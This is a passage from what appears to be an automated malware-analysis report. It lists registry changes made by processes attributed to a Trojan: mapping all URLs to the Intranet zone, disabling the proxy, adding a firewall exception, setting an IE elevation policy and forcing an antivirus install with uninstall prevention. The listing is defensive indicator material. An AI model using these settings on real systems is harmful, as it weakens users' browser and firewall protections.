"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process xianfengkunbang.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 40 C0 11 D4 F1 F7 8B 5A 07 29 45 1C B6 47 3C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process MM-liao8863.exe:2808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8863.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1437574637"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 2E F4 CB F3 7C 8A 2B C9 CF 9B 62 83 0D C7 05"

[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv088_63.exe" = "9158chat2_ktv088_63"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BaiduP2PService.exe:252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB FA 69 4C C0 C7 50 A1 D7 27 0F B2 91 8C 1E AA"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppName" = "BaiduP2PService.exe"
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppPath" = "%Program Files%\tools"

The process BaiduP2PService.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "QQPCDownload71960"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"MM-liao8863.exe" = "DownloadInstall Microsoft 基础类应用程序"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"install1393485.exe" = "install1393485"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 86 7E 81 D2 97 6E 60 45 C3 D1 35 EA 7E 52 3D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process xianfeng.exe:272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 11 AE 1D 91 1E 2A 9D 7D DA 54 76 F9 70 26 CE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process RsMgrSvc.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 53 FB AD 0B 3C D3 55 0E E3 15 E6 AA 3D ED 0A"

The process QQPCDownload71960.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D D8 20 E4 30 8C 29 EA ED 91 01 ED 69 00 98 F0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe:*:Enabled:Tencent Download Program"

The process regsvr32.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 6F 6F 82 35 2B E6 B4 42 4C C9 1E F6 D5 B3 F6"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

The process regsvr32.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 27 00 09 3B BD 71 E4 0F BB D9 70 13 B6 83 45"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"

[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"

[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"

[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"

The process regsvr32.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 47 06 DB 24 F6 FB 0E AB 15 D2 57 42 3D E2 D3"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

The process regsvr32.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 F0 F9 DF 51 78 58 28 95 D9 6D 0E 0B C2 39 DE"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

The process install1393485.exe:1148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1478494857"

[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"rstrayexe" = "gWx0Lv5HQEgHSwg0HF4LXHw="

"RAV" = "gWx0Lv5HYHol0A=="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"InstallPath" = "gWx0Lv5HF2shdi4fc3Y3cDtobmkaSgAjVWcheD8D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1446872457"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"Title" = "gWx0Lv5H-suj/tn/-pC71NWzoQ=="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

